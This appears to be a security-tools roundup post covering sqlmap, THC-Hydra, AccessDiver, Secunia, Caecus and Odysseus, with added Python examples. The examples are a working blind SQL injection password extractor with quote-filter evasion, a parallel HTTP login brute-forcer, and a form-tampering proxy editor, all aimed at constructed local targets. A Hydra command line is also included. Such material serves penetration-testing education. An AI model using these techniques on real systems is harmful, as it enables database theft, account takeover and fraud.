sqlmap – Automated Blind SQL Injection Tool

sqlmap is an automatic blind SQL injection tool, developed in Python, capable of enumerating an entire remote database, performing an active database fingerprint and much more. The aim of the project is to implement a fully functional database mapper tool that takes advantage of web application programming flaws which lead to SQL injection vulnerabilities.

Features

  • Test of remote URL stability, based on page hash or string match;
  • Identification of dynamic URL parameters;
  • Tests for numeric and string (single-quote and double-quote) SQL injection on all dynamic URL parameters; the first vulnerable parameter found is used for all subsequent injections;
  • Selection of the HTTP method used to test and exploit dynamic parameters, GET or POST (default: GET);
  • Fingerprint of the web application's database back-end, based on the output of specific queries that identify database characteristics, and on banner grabbing;
  • Random HTTP User-Agent header selection;
  • An HTTP Cookie header can be provided, useful when the web application requires cookie-based authorization and you have an account;
  • An anonymous HTTP proxy address can be provided through which requests to the target URL are relayed;
  • Other command line options to retrieve the database banner, enumerate databases, tables and columns, dump values, retrieve the contents of an arbitrary file, and run your own SQL expression against the remote database;
  • Debug output messages in verbose mode;
  • Evasion of the PHP magic_quotes_gpc setting by encoding every string in the query, i.e. everything between single quotes, with the CHAR() (or equivalent) database function.
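To make the inference concrete, here is an added example (written for this page, not sqlmap's own code) of the boolean-based blind technique the feature list describes: a constructed SQLite-backed "web application" with an injectable numeric id parameter and an emulated magic_quotes_gpc, and an attacker side that recovers a value one character at a time by comparing page hashes against a baseline, sending its string literals as CHAR()/CHR() expressions so that no quote character is needed. The schema, credentials and page bodies are made up; the char_encode helper also covers the PostgreSQL/Oracle and MS SQL forms, which goes beyond what the list above says.

```python
"""Boolean-based blind SQL injection inference against a constructed target.

Added example, not sqlmap's own code. The 'web application' is a function
running a deliberately vulnerable query; the attacker side sees only the
page body it returns and decides TRUE/FALSE by comparing page hashes."""
import hashlib
import sqlite3

# --- constructed target -----------------------------------------------------
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE items(id INTEGER, name TEXT);
    INSERT INTO items VALUES (1, 'widget'), (2, 'gadget');
    CREATE TABLE users(login TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', 's3cret');
""")

def vulnerable_page(param_id: str) -> str:
    """Vulnerable on purpose: the 'id' parameter is concatenated into SQL.
    magic_quotes_gpc is emulated by applying PHP addslashes() semantics."""
    quoted = (param_id.replace("\\", "\\\\")
                      .replace("'", "\\'").replace('"', '\\"'))
    sql = "SELECT name FROM items WHERE id=" + quoted
    try:
        rows = _db.execute(sql).fetchall()
    except sqlite3.Error:
        return "<html><h1>Error</h1><p>database error</p></html>"
    if rows:
        return "<html><h1>Item</h1><p>%s</p></html>" % rows[0][0]
    return "<html><h1>Item</h1><p>not found</p></html>"

# --- attacker side ----------------------------------------------------------
def page_hash(body: str) -> str:
    return hashlib.md5(body.encode()).hexdigest()

def char_encode(s: str, backend: str = "mysql") -> str:
    """Rewrite a string literal without quote characters, per back-end
    (MySQL and SQLite: CHAR(a,b); PostgreSQL/Oracle: CHR(a)||CHR(b);
    MS SQL: CHAR(a)+CHAR(b))."""
    codes = [ord(c) for c in s]
    if backend in ("mysql", "sqlite"):
        return "CHAR(%s)" % ",".join(map(str, codes))
    if backend in ("postgresql", "oracle"):
        return "||".join("CHR(%d)" % c for c in codes)
    if backend == "mssql":
        return "+".join("CHAR(%d)" % c for c in codes)
    raise ValueError("unknown backend " + backend)

def condition_is_true(baseline: str, condition: str) -> bool:
    """Inject 'AND <condition>' behind the known-good value 1; the page hash
    matches the baseline only when the condition evaluated TRUE."""
    return page_hash(vulnerable_page("1 AND " + condition)) == baseline

def extract(query: str, max_len: int = 32) -> str:
    """Recover the single text value returned by `query`, one character per
    7 requests, by binary search over the ASCII range of each position."""
    baseline = page_hash(vulnerable_page("1"))
    # stability check: baseline repeats, and a FALSE condition looks different
    assert page_hash(vulnerable_page("1")) == baseline
    assert page_hash(vulnerable_page("1 AND 1=2")) != baseline
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "UNICODE(SUBSTR((%s),%d,1))>%d" % (query, pos, mid)
            if condition_is_true(baseline, cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:   # past the end of the string every comparison is FALSE
            break
        out += chr(lo)
    return out

if __name__ == "__main__":
    # quotes get escaped by the magic_quotes emulation, CHAR() does not
    print(extract("SELECT password FROM users WHERE login='admin'"))
    print(extract("SELECT password FROM users WHERE login=" + char_encode("admin")))
```

The quoted form of the query yields nothing because the escaped quotes break the injected SQL, while the CHAR() form recovers the password; on a real target the same comparison logic is what makes the URL stability check in the first bullet matter, since a page that changes between identical requests (timestamps, ad rotation) defeats hash comparison and string matching has to be used instead.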

You can find out more at http://sqlmap.sourceforge.net/ and the documentation is available here.

You can download sqlmap at:

sqlmap Files Page

For the development release you can browse its SourceForge SVN repository or check out the source code directly:

$ svn co https://sqlmap.svn.sourceforge.net/svnroot/sqlmap sqlmap

THC-Hydra

THC-Hydra rocks; it is pretty much the most up-to-date and actively developed password brute-forcing tool around at the moment.

It supports a LOT of services and protocols too.

Passwords are the number one security hole, as every password security study shows. Hydra is a parallelized login cracker that supports numerous protocols to attack. New modules are easy to add; besides that, it is flexible and very fast.

There are already several login cracking tools available, but none of them supports more than one protocol to attack or parallelized connections.

Currently this tool supports:

TELNET, FTP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP-PROXY, LDAP2,
LDAP3, SMB, SMBNT, MS-SQL, MYSQL, POSTGRES, REXEC, SOCKS5, VNC, POP3, IMAP,
NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, SMTP-AUTH, SSH2, SNMP,
CVS, Cisco AAA.

However, the module engine makes adding new services very easy, so it should not take long until even more services are supported. Planned are: SSH v1, Oracle and more…
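The two properties the text stresses, parallel connections and a module per protocol, are easy to see in a small engine. The following is an added example written for this page, not THC-Hydra's own code: protocol modules are plain callables with one signature, so a new service is one more entry in a table, and the engine runs the user/password pairs over a pool of parallel connections. The target is a constructed local HTTP server that protects one path with Basic authentication, standing in for a real HTTP-GET target; the credential store, path and wordlist are made up for the demonstration.

```python
"""A minimal parallelized, module-based login cracker in the style of Hydra.

Added example, not THC-Hydra's code. Only one module (http-get) is shown;
the target server, its credentials and the wordlist are constructed."""
import base64
import http.client
import threading
from concurrent.futures import ThreadPoolExecutor
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# ---- constructed target: /admin/ requires Basic auth --------------------------
VALID = {"admin": "letmein"}          # constructed credential store

class _Target(BaseHTTPRequestHandler):
    def do_GET(self):
        hdr = self.headers.get("Authorization", "")
        ok = False
        if hdr.startswith("Basic "):
            try:
                user, _, pw = base64.b64decode(hdr[6:]).decode().partition(":")
                ok = VALID.get(user) == pw
            except Exception:       # malformed token: treat as bad credentials
                ok = False
        if ok:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"welcome")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="admin"')
            self.end_headers()

    def log_message(self, *args):    # keep the console quiet
        pass

def start_target():
    """Start the target on a free loopback port; returns (host, port)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _Target)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address

# ---- protocol modules: (host, port, user, password) -> bool -------------------
def http_get_module(host, port, user, password, path="/admin/"):
    """Hydra-style http-get: one GET with Basic credentials; 200 means a hit."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path, headers={"Authorization": "Basic " + token})
        return conn.getresponse().status == 200
    finally:
        conn.close()

MODULES = {"http-get": http_get_module}   # adding a service = adding an entry

# ---- parallel engine --------------------------------------------------------
def crack(service, host, port, users, passwords, tasks=16):
    """Try every user/password pair over `tasks` parallel connections and
    return the list of (user, password) pairs that logged in."""
    module = MODULES[service]
    found, lock = [], threading.Lock()

    def attempt(pair):
        user, pw = pair
        if module(host, port, user, pw):
            with lock:
                found.append(pair)

    pairs = [(u, p) for u in users for p in passwords]
    with ThreadPoolExecutor(max_workers=tasks) as pool:
        list(pool.map(attempt, pairs))     # list() re-raises worker errors
    return found

if __name__ == "__main__":
    host, port = start_target()
    print(crack("http-get", host, port, ["admin"], ["123456", "password", "letmein"]))
```

With the real tool the same job is a one-liner of the form `hydra -l admin -P passwords.txt -t 16 <host> http-get`, where `-t` sets the number of parallel connections; the exact argument syntax for the protected path varies between Hydra versions, so check the README shipped with the release you use.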

This tool is proof-of-concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.

There is a lot more information contained in the README file here.

You can download Hydra here:

hydra-5.4-src.tar.gz

Compile and install (./configure; make; make install)

If you want the Windows version you can grab this Cygwin build:

hydra-5.4-win.zip

More info is available here:

THC-Hydra Homepage

AccessDiver – Web Site Security Testing

AccessDiver is a security tester for web sites. It incorporates a set of powerful features which help you find and organize failures and weaknesses in your web site.

AccessDiver can detect security failures on your web pages. It has multiple efficient tools which accurately verify the robustness of your accounts and directories, so you will know whether your customers, your users and you yourself can safely use your web site.


Here is a quick list of the features available:

  • Contains a fast security tester that uses up to 100 bots to do its analysis.
  • Detects directory failures by comparing hundreds of known problems against your site.
  • AccessDiver is fully proxy compliant and has a proxy analyzer (speed / anonymity) and a proxy hunter built in.
  • A built-in word leecher helps you increase the size of your dictionaries, expanding and reinforcing your analysis.
  • A powerful task automizer manages your jobs transparently. You can tackle unrelated tasks while AccessDiver is working, saving you time.
  • An on-the-fly word manipulator lets you increase the strength of your dictionaries easily during analysis.
  • A PING tester is included to tell you the responsiveness of your site and of any Internet address you would like to access.
  • A DNS resolver lets you look up the host name of an IP address and reverse the process to learn the address of a host name.
  • A feature called ‘HTTP debugger’ helps you understand how the actual HTTP protocol works. It opens up the process so you can see what really happens during a connection problem.
  • A WHOIS gadget lets you retrieve the owner information of a domain name (in case you would like to buy the domain or contact the current owner).
  • An update notifier automatically tells you when a new version of AccessDiver is available.

You can find out more here and download AccessDiver here:

AccessDiver

Secunia

Feature Overview – The Secunia Software Inspector:

  • Detects insecure versions of applications installed
  • Verifies that all Microsoft patches are applied
  • Assists you in updating your system and applications
  • Runs through your browser. No installation or download is required.

How Does it Work:

The Secunia Software Inspector relies on carefully crafted “Secunia File Signatures” to recognise applications on your system. The detected applications are then matched against our “Secunia Advisory Intelligence” to determine whether an application is up-to-date or not. The results are then used to advise you on how to update to more secure releases of the insecure applications.

Microsoft Windows Update is used to determine if your system is missing security updates from Microsoft.

The Secunia Software Inspector covers the most common/popular end user applications:

  • Internet browsers
  • Internet browser plugins
  • Instant messaging clients
  • Email clients
  • Media players
  • Operating systems

You can find the Inspector here:

Secunia Software Inspector

Minimum Requirements:

  • Windows 2000, Windows XP, or Windows 2003
  • Sun Java JRE 1.5.0_06
  • Internet Explorer 6.x, Opera 9.x, or Firefox 1.5.x
  • Latest version of Microsoft Windows Update

Caecus

Caecus is a unique tool which can brute-force some OCR form-based protections.

As far as we know at Darknet, this is the only publicly available OCR brute-forcing tool.

These scripts generate a digital image, commonly called an OCR check, as an extra layer of security. Some versions of the script also use session IDs to keep track of this information.


Using Caecus, you can now successfully run attacks on these sites.

There are some OCR sites that use another form type. You can recognize them by the ‘grid’ behind the numbers in the image. Caecus cannot test these sites… yet!

You can read more about and download Caecus here:

Caecus at Deny.de

Odysseus Win32 Proxy & Telemachus HTTP Transaction Analysis

Introducing a pair of tools that go well together and give you good control over HTTP transaction analysis and examining the security of web applications.

Odysseus is a tool designed for testing the security of web applications.

Odysseus is a proxy server, which acts as a man-in-the-middle during an HTTP session. A typical HTTP proxy will relay packets to and from a client browser and a web server. Odysseus will intercept an HTTP session’s data in either direction and give the user the ability to alter the data before transmission.

For example, during a normal HTTPS connection a typical proxy relays the session between the server and the client and lets the two end nodes negotiate SSL. In contrast, when in intercept mode, Odysseus pretends to be the server and negotiates two SSL sessions, one with the client browser and another with the web server. The browser therefore sees a certificate presented by the proxy rather than the real server’s, and will warn about it unless the proxy’s certificate has been trusted.

As data is transmitted between the two nodes, Odysseus decrypts the data and gives the user the ability to alter and/or log the data in clear text before transmission.
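What "altering the data before transmission" involves in practice, as an added example written for this page and not Odysseus’ own code: a raw HTTP request is split into request line, headers and body, a form field is changed, and the request is reassembled with a recomputed Content-Length, since a body edited by hand without that fix-up makes the server read a truncated or over-long body. The captured request, the shop host and the hidden price field are constructed for the demonstration.

```python
"""Editing an intercepted HTTP request, with the Content-Length fix-up an
intercepting proxy must apply after the body changes.

Added example, not Odysseus' code; the captured request is constructed."""
from urllib.parse import parse_qsl, urlencode

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (request line, header list, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body

def serialize_request(request_line, headers, body: bytes) -> bytes:
    """Reassemble the request; Content-Length always reflects the real body."""
    had_length = any(n.lower() == "content-length" for n, _ in headers)
    fixed = [(n, v) for n, v in headers if n.lower() != "content-length"]
    if body or had_length:
        fixed.append(("Content-Length", str(len(body))))
    head = "\r\n".join([request_line] + [f"{n}: {v}" for n, v in fixed])
    return head.encode("iso-8859-1") + b"\r\n\r\n" + body

def intercept(raw: bytes, edit_form) -> bytes:
    """Apply edit_form(dict) -> dict to a form-encoded body and re-serialize.
    Requests with any other content type pass through untouched."""
    request_line, headers, body = parse_request(raw)
    ctype = {n.lower(): v for n, v in headers}.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        fields = dict(parse_qsl(body.decode(), keep_blank_values=True))
        body = urlencode(edit_form(fields)).encode()
    return serialize_request(request_line, headers, body)

def length_consistent(raw: bytes) -> bool:
    """Check a request: declared Content-Length equals the actual body size."""
    _, headers, body = parse_request(raw)
    declared = {n.lower(): v for n, v in headers}.get("content-length")
    return declared is not None and int(declared) == len(body)

# constructed capture: the checkout form carries the price as a hidden field,
# so a client-side price is trusted by the server (the classic thing to test)
CAPTURED = (
    b"POST /cart/checkout HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 32\r\n"
    b"\r\n"
    b"item=42&qty=1&price=1999&coupon="
)

if __name__ == "__main__":
    edited = intercept(CAPTURED, lambda f: {**f, "price": "1"})
    print(edited.decode())
    print("consistent:", length_consistent(edited))
```

The same parse/serialize pair is what a logging proxy needs in the other direction: the response side has the identical trap, and Telemachus-style after-the-fact analysis of a saved log only makes sense if the recorded lengths match what was actually sent.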

You can find more and download Odysseus here:

http://www.bindshell.net/tools/odysseus

Telemachus is a companion utility for Odysseus, allowing further analysis and manipulation of the HTTP transactions that have passed through Odysseus.

Telemachus can communicate with the currently active instance of Odysseus, or alternately load a previously saved Odysseus activity log file.

Although primarily designed to be used in conjunction with Odysseus, Telemachus can be used as a stand-alone utility.

You can download Telemachus here:

http://www.bindshell.net/tools/telemachus